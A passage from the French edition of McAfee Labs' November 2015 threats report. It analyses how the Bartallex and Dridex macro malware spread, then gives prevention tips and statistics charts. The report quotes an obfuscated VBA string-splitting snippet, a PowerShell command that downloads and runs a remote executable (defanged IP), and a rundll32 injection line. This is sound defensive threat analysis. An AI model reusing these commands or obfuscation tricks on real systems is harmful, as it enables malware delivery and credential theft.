Les deux premières lignes utilisent une technique de dissimulation classique. ■■ BART212 = "" & "d-up" + "date" ■■ BART2 = Chr(97) + Chr(100) & "" & "o" & "" & "b" & "e" + "ac" & BART212 La division des variables est une pratique couramment utilisée pour contourner les analyseurs à la recherche de mots clés et autres activités suspectes telles que les téléchargements de fichier. La fonction Chr renvoie une chaîne contenant le caractère associé au code de caractère spécifié. Par exemple, Chr(97) est la lettre a et Chr(100) est la lettre d. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 42 Points marquants Après avoir supprimé les sauts de ligne et avoir effectué les substitutions, nous obtenons une chaîne porteuse de sens : BART2 = "adobeacd-update". Une autre variante de Bartallex utilise un mécanisme de dissimulation différent pour dérouter les chercheurs en sécurité. L'ouverture du document avec les macros activées entraîne l'exécution du fichier de commandes déposé, qui exécute à son tour le fichier .vbs, lequel télécharge immédiatement d'autres logiciels malveillants, tels qu'Upatre, Vawtrak et Chanitor, à partir du serveur distant. (Cliquez ici pour en savoir plus sur Bartallex.) Logiciel malveillant connecté au serveur de contrôle http:/xx.xxx.254.213 pour télécharger la charge active, qui semble être un fichier .jpg mais est en réalité un fichier exécutable malveillant Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 43 Points marquants Comportement de Dridex Dans le cas de Dridex, le document joint peut arriver sous la forme de deux variantes : ■■ La première variante prend la forme d'un document XML (.xml ou .doc) contenant un objet Office incorporé chiffré en Base64, qui est déchiffré et exécuté à l'ouverture du fichier XML. L'objet ActiveMime incorporé contient un document OLE chiffré qui est déchiffré et exécuté juste après l'ouverture de l'objet Office par le fichier XML. Le fichier OLE exécute ensuite une macro malveillante incorporée contenant du code semblable à l'illustration suivante : Ce code exécute PowerShell et télécharge le chargeur de Dridex. ■■ La seconde variante prend la forme d'un document Word ou Excel contenant un objet actif Office qui exécute le code malveillant dans le fichier OLE en tant que code OLE natif. Les auteurs de logiciels malveillants diffusés par macro sont rusés : même si l'utilisateur n'a pas activé l'exécution des macros, le logiciel malveillant peut être exécuté en lançant le code malveillant directement à partir du fichier OLE. Pour tromper l'utilisateur, le logiciel malveillant présente un fichier document contenant un objet actif incorporé. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 44 Points marquants Les utilisateurs reçoivent un avertissement concernant l'ouverture d'objets actifs malveillants, semblable à l'avertissement affiché lorsqu'ils tentent d'ouvrir un document contenant une macro incorporée. Un utilisateur négligent peut ouvrir l'objet actif incorporé en ignorant l'avertissement et en double-cliquant sur l'objet malveillant. Dans ce cas, le code du programme de téléchargement s'exécute en lançant une instance PowerShell, comme c'est le cas pour la variante précédente. Dans les deux cas, le code malveillant incorporé exécute une instruction de ligne de commande qui exécute powershell.exe avec les paramètres suivants : ■■ cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('hxxp:// 62.xx.xx.15 /asalt/assa. exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe; Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 45 Points marquants Le code précédent s'exécute uniquement si PowerShell est installé. Après avoir exécuté ce code, le logiciel malveillant télécharge et exécute le chargeur Dridex, qui télécharge et installe la DLL Dridex, qui est injectée dans explorer.exe en exécutant la commande suivante : ■■ rundll32.exe "C:\XX.tmp" NotifierInit Après l'exécution de cette commande, Dridex s'installe sur le système, rundll.exe est arrêté et le système est infecté. Le logiciel malveillant contacte ensuite son ou ses serveurs de contrôle pour signaler l'infection. Dridex est un logiciel malveillant bancaire capable de dérober les informations d'identification pour les comptes en ligne ; il est dérivé de Cridex. Ces deux logiciels appartiennent à la famille de logiciels malveillants GameOver Zeus. (Cliquez ici pour en savoir plus sur Dridex.) Récemment, McAfee Labs a également découvert des attaques basées sur des macros qui propagent le malware de point de vente Evoltin. Celui-ci vole le nom de l'ordinateur, le GUID et d'autres informations sur les cartes bancaires, puis transmet ces données au serveur distant via une requête HTTP POST. (Cliquez ici pour en savoir plus sur Evoltin.) Conclusion Bien que l'utilisation de macros pour diffuser des logiciels malveillants soit une technique ancienne, les macros malveillantes actuelles ont gagné en efficacité et flexibilité en exploitant des fonctionnalités telles que PowerShell. Les auteurs de malware ont depuis longtemps adopté les macros pour leur simplicité, leur facilité de programmation ainsi que d'autres fonctionnalités pour attaquer les victimes et propager les logiciels malveillants. Ils utilisent régulièrement les techniques d'ingénierie sociale pour infecter un grand nombre d'utilisateurs. En général, il n'est pas nécessaire d'activer les macros pour afficher le contenu d'un document. Si vous recevez un document qui vous invite à activer une macro, soyez prudent. Ces ruses peuvent facilement être contrées en restant vigilant. Prévention Pour protéger les utilisateurs contre les logiciels malveillants diffusés par macro, il est essentiel de les informer de l'existence de ce type de malware ainsi que de ses modes de propagation. Une formation régulière des utilisateurs permettra de les sensibiliser au problème. De plus, diverses mesures peuvent être mises en œuvre par les utilisateurs et les entreprises pour accroître la protection. Adoptez le niveau de sécurité requis pour chaque application. Par exemple, il est peu probable que PowerPoint utilise des macros ; les utilisateurs peuvent donc désactiver cette fonctionnalité. Les serveurs de messagerie et les analyseurs antivirus peuvent être configurés pour analyser le trafic de messagerie et filtrer les pièces jointes contenant des macros, éventuellement en envoyant un message d'avertissement au destinataire. Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 46 Points marquants McAfee Labs recommande les mesures suivantes pour lutter contre les attaques de logiciels malveillants diffusés par macro : Découvrez comment Intel Security peut vous aider à vous protéger contre cette menace. ■■ ■■ ■■ ■■ ■■ ■■ ■■ ■■ ■■ ■■ ■■ Activez les mises à jour automatiques de vos systèmes d'exploitation ou téléchargez-les régulièrement afin de bénéficier en permanence des derniers correctifs pour les vulnérabilités connues. Configurez votre logiciel antimalware pour qu'il analyse automatiquement tous les fichiers joints aux e-mails et aux messages instantanés. Vérifiez que l'ouverture des pièces jointes n'est pas automatique dans vos programmes de messagerie, pas plus que l'affichage des images. Assurez-vous par ailleurs que le volet d'aperçu est désactivé. Configurez les paramètres de sécurité du navigateur à un niveau moyen ou élevé. Soyez très prudent lorsque vous ouvrez des pièces jointes, surtout celles portant l'extension .doc ou .xls. N'ouvrez jamais des e-mails non sollicités ou des fichiers joints que vous n'attendez pas, même s'ils proviennent de personnes que vous connaissez. Méfiez-vous du spam, susceptible de masquer des tentatives de phishing. Ne cliquez pas sur les liens figurant dans les e-mails ou les messages instantanés. Établissez une surveillance réseau permettant d'identifier les requêtes ping inattendues envoyées par les ordinateurs internes aux adresses IP telles que 1.3.1.2 ou 2.2.1.1, etc. Sachez que les reçus ou les documents de facturation ne nécessitent généralement pas des macros. Utilisez une suite Microsoft Office à jour pour bénéficier d'une meilleure protection contre ces types d'attaques. Soyez prudent lorsque vous manipulez des documents vides qui invitent les utilisateurs à activer les macros pour afficher le contenu du document. Assurez-vous que le paramètre de sécurité des macros par défaut est défini sur Élevé sur tous les produits Office. Pour découvrir comment les produits Intel Security détectent les logiciels malveillants diffusés par macro, cliquez ici. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 47 Statistiques sur les menaces Menaces ciblant les équipements mobiles Logiciels malveillants Menaces web Attaques réseau Donner votre avis Statistiques sur les menaces Menaces ciblant les équipements mobiles Nouveaux malveillants sur mobiles Nouveauxlogiciels logiciels malveillants sur mobiles 1 400 000 Le nombre de nouveaux échantillons de logiciels malveillants sur mobiles continue de croître. Les infections ont également augmenté, mais pas au même rythme, grâce au renforcement des défenses des systèmes d'exploitation. L'augmentation du nombre d'échantillons reflète sans doute les efforts des attaquants qui souhaitent contourner ces défenses. 1 200 000 1 000 000 800 000 600 000 400 000 200 000 0 4e trim. 2013 1er trim. 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Source : McAfee Labs, 2015 Nombre total malveillants mobiles Nombre totalde delogiciels logiciels malveillants sursur mobiles 10 000 000 9 000 000 8 000 000 7 000 000 6 000 000 5 000 000 4 000 000 3 000 000 2 000 000 1 000 000 0 4e trim. 2013 1er trim. 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Source : McAfee Labs, 2015 Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 49 Statistiques sur les menaces Taux d'infection par des logiciels malveillants sur mobiles par région (3e trimestre 2015) 14 % 12 % 10 % 8% 6% 4% 2% 0 Afrique Asie Australie Europe Amérique du Nord Amérique du Sud Source : McAfee Labs, 2015 Taux d'infection par des logiciels malveillants sur mobiles au niveau mondial 22 % 20 % 18 % 16 % 14 % 12 % 10 % 8% 6% 4% 2% 0 4e trim. 2013 1er trim. 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Source : McAfee Labs, 2015 Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 50 Statistiques sur les menaces Logiciels malveillants Nouveaux malveillants Nouveaux logiciels logiciels malveillants 50 000 000 La collection de nouveaux logiciels malveillants de McAfee Labs a reculé de 4 % ce trimestre, probablement en raison du nombre extrêmement variable de parasites. 45 000 000 40 000 000 35 000 000 30 000 000 25 000 000 20 000 000 15 000 000 10 000 000 5 000 000 0 4e trim. 2013 1er trim. 2e trim. 3e trim 2014 4e trim. 1er trim. 2e trim. 2015 3e trim Source : McAfee Labs, 2015 Nombre logicielsmalveillants malveillants Nombretotal total de de logiciels 500 000 000 La progression implacable des logiciels malveillants continue. Nous nous attendons à dépasser la barre du demi-milliard d'échantillons d'ici à la fin 2015. 450 000 000 400 000 000 350 000 000 300 000 000 250 000 000 200 000 000 150 000 000 100 000 000 50 000 000 0 4e trim. 2013 1er trim. 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Source : McAfee Labs, 2015 Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 51 Statistiques sur les menaces Nouveaux rootkits Nouveaux rootkits 100 000 Le nombre de nouveaux rootkits a chuté de 65 %, atteignant ainsi son niveau le plus bas depuis 2008. Ce déclin est probablement dû à une chute de la rentabilité des attaques. Dans la version 64 bits de Windows, Microsoft met en œuvre la signature obligatoire des pilotes et inclut PatchGuard, qui complique considérablement le piratage du noyau. Le pic enregistré aux 1er et 2e trimestres 2014 était dû à une seule famille de rootkits qui semble être arrivée en bout de course. 90 000 80 000 70 000 60 000 50 000 40 000 30 000 20 000 10 000 0 4e trim. 2013 1er trim. 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Source : McAfee Labs, 2015 Nombre derootkits rootkits Nombre total total de 1 800 000 1 600 000 1 400 000 1 200 000 1 000 000 800 000 600 000 400 000 200 000 0 4e trim. 2013 1er trim. 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Source : McAfee Labs, 2015 Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 52 Statistiques sur les menaces NouveauxNouveaux logicielslogiciels de demande de rançon (ransomware) de demande de rançon 1 400 000 Le nombre de nouveaux échantillons de logiciels de demande de rançon a chuté de 40 % au 3e trimestre. Le pic enregistré au 2e trimestre était dû à Virus.Win32.PolyRansom.f, une famille de ransomware parasite qui fausse les chiffres en raison de la création rapide de nouvelles variantes. 1 200 000 1 000 000 800 000 600 000 400 000 200 000 0 4e trim. 2013 1er trim. 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Source : McAfee Labs, 2015 Nombre total de logiciels de demande de rançon (ransomware) Nombre total de logiciels de demande de rançon 5 500 000 5 000 000 4 500 000 4 000 000 3 500 000 3 000 000 2 500 000 2 000 000 1 500 000 1 000 000 500 000 0 4e trim. 2013 1er trim. 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Source : McAfee Labs, 2015 Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 53 Statistiques sur les menaces Nouveaux malveillants signés Nouveauxfichiers fichiers binaires binaires signés malveillants 2 500 000 Le nombre de nouveaux fichiers binaires malveillants signés a baissé de 26 % au 3e trimestre et représente seulement la moitié des échantillons collectés au 2e trimestre 2014. 2 250 000 2 000 000 1 750 000 1 500 000 1 250 000 1 000 000 750 000 500 000 250 000 0 4e trim. 2013 1er trim. 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Source : McAfee Labs, 2015 Nombre total binairessignés malveillants signés Nombre totalde defichiers fichiers binaires malveillants 20 000 000 17 500 000 15 000 000 12 500 000 10 000 000 7 500 000 5 000 000 2 500 000 0 4e trim. 2013 1er trim. 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Source : McAfee Labs, 2015 Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 54 Statistiques sur les menaces Nouveaux malveillants pour Mac OS Nouveauxlogiciels logiciels malveillants pour Mac OS 30 000 Les auteurs de logiciels malveillants s'intéressent de plus en plus à la plate-forme Mac. À compter de ce rapport, nous commençons à comptabiliser les logiciels malveillants qui ciblent Mac OS. Au 3e trimestre, nous avons enregistré quatre fois plus de malware visant Mac OS qu'au 2e trimestre. Cette augmentation est essentiellement due à une seule menace. 25 000 20 000 15 000 10 000 5 000 0 4e trim. 2013 1er trim. 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Source : McAfee Labs, 2015 Nombre total malveillants pour Nombre totalde delogiciels logiciels malveillants pour MacMac OS OS 60 000 55 000 50 000 45 000 40 000 35 000 30 000 25 000 20 000 15 000 10 000 5 000 0 4e trim. 2013 1er trim. 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Source : McAfee Labs, 2015 Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 55 Statistiques sur les menaces Menaces web Nouvelles URLsuspectes suspectes Nouvelles URL 35 000 000 30 000 000 25 000 000 20 000 000 15 000 000 10 000 000 5 000 000 0 4e trim. 2013 1er trim. URL 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Domaines associés Source : McAfee Labs, 2015 Nouvelles URLde dephishing phishing Nouvelles URL 2 500 000 2 250 000 2 000 000 1 750 000 1 500 000 1 250 000 1 000 000 750 000 500 000 250 000 0 4e trim. 2013 URL 1er trim. 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Domaines associés Source : McAfee Labs, 2015 Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 56 Statistiques sur les menaces Nouvelles URLde despam spam Nouvelles URL 2 500 000 2 000 000 1 500 000 1 000 000 500 000 0 4e trim. 2013 1er trim. URL 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Domaines associés Source : McAfee Labs, 2015 Volume de spam et d'e-mails dans le monde (en milliers de milliards de messages) 11,0 10,0 9,0 8,0 7,0 6,0 5,0 4,0 3,0 2,0 1,0 0 4e trim. 2013 Spam 1er trim. 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. E-mails légitimes Source : McAfee Labs, 2015 Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 57 Statistiques sur les menaces E-mails de spam émanant des 10 principaux réseaux de robots (botnets) (en millions de messages) Kelihos, qui offre des produits de grande distribution et des produits pharmaceutiques de contrefaçon, retrouve la première place du classement des réseaux de robots de spam après une période d'inactivité de deux trimestres. Bien que le volume de spam émanant de réseaux de robots reste bas par rapport à 2014, ce volume a légèrement augmenté au 3e trimestre, à la suite d'améliorations incrémentielles apportées par McAfee Labs à ses outils de télémétrie. 1 400 1 200 1 000 800 600 400 200 0 4e trim. 2013 1er trim. 2e trim. 3e trim. 2014 4e trim. Kelihos Darkmailer Dyre Slenfbot Cutwail Lethic Gamut Asprox Stealrat 1er trim. 2e trim. 2015 3e trim. Autres Source : McAfee Labs, 2015 Prévalence des réseaux de robots (botnets) dans le monde Prévalence des réseaux de robots (botnets) dans le monde (3e trimestre 2015) Wapomi se propage sous la forme d'un ver et infecte les fichiers .exe. Il tente également de télécharger d'autres fichiers qui créent une attaque par déni de service distribué. Cette propagation fréquente explique sa popularité ; cependant, un grand nombre des serveurs de contrôle qu'il nécessite ont déjà été rendus inaccessibles par des sinkholes. Wapomi Muieblackcat 21 % 29 % 2% Sality Ramnit 3% Maazben 4% 5% 14 % 8% 12 % Darkness NGRBot H-Worm Autres Source : McAfee Labs, 2015 Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 58 Statistiques sur les menaces Principaux pays hébergeant des serveurs Principaux pays hébergeant des serveurs de contrôle de réseaux de robots de contrôle de réseaux de robots (3e trimestre 2015) États-Unis Chine Allemagne 26 % Brésil 38 % Russie 6% Pays-Bas Corée du Sud 5% 4%4% 4% 4% 5% Algérie France Autres Source : McAfee Labs, 2015 Attaques réseau Principales attaques réseaux Principales attaques réseau (3e trimestre 2015) Déni de service Navigateur 19 % 1% 2% 2% 30 % Attaque en force SSL 2% Balayage 5% 16 % Réseau de robots (botnet) 23 % Shellshock Porte dérobée (backdoor) Autres Source : McAfee Labs, 2015 Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 59 À propos d'Intel Security Commentaires et suggestions Pour nous aider à améliorer encore les prochaines éditions de ce rapport, nous aimerions connaître votre opinion. Si vous souhaitez nous faire part de vos impressions, cliquez ici pour participer à une petite enquête sur nos rapports. Elle ne vous prendra pas plus de cinq minutes. McAfee fait désormais partie d'Intel Security. Avec sa stratégie Security Connected, son approche innovante de la sécurité optimisée par le matériel et son réseau mondial de cyberveille sur les menaces Global Threat Intelligence, Intel Security met tout en œuvre pour proposer des solutions et des services de sécurité proactifs et éprouvés, qui assurent la protection des systèmes, réseaux et équipements mobiles des entreprises et des particuliers du monde entier. Intel Security associe le savoir-faire et l'expérience de McAfee aux innovations et aux performances reconnues d'Intel pour faire de la sécurité un élément essentiel de chaque architecture et plate-forme informatique. La mission d'Intel Security est de permettre à chacun de vivre et de travailler en toute confiance et en toute sécurité dans le monde numérique. www.intelsecurity.com Suivre McAfee Labs McAfee. Part of Intel Security. Tour Pacific 13, Cours Valmy - La Défense 7 92800 Puteaux France +33 1 47 62 56 09 (standard) www.intelsecurity.com Les renseignements contenus dans le présent document ne sont fournis qu'à titre informatif, au bénéfice des clients de McAfee. Les informations présentées ici peuvent faire l’objet de modifications sans préavis et sont fournies sans garantie ni représentation quant à leur exactitude ou à leur adéquation à une situation ou à des circonstances spécifiques. Intel et les logos Intel et McAfee sont des marques commerciales d'Intel Corporation ou de McAfee, Inc. aux États-Unis et/ou dans d'autres pays. Les autres noms et marques sont la propriété de leurs détenteurs respectifs. Copyright © 2015 Intel Corporation. 62189rpt_nov-threats_1215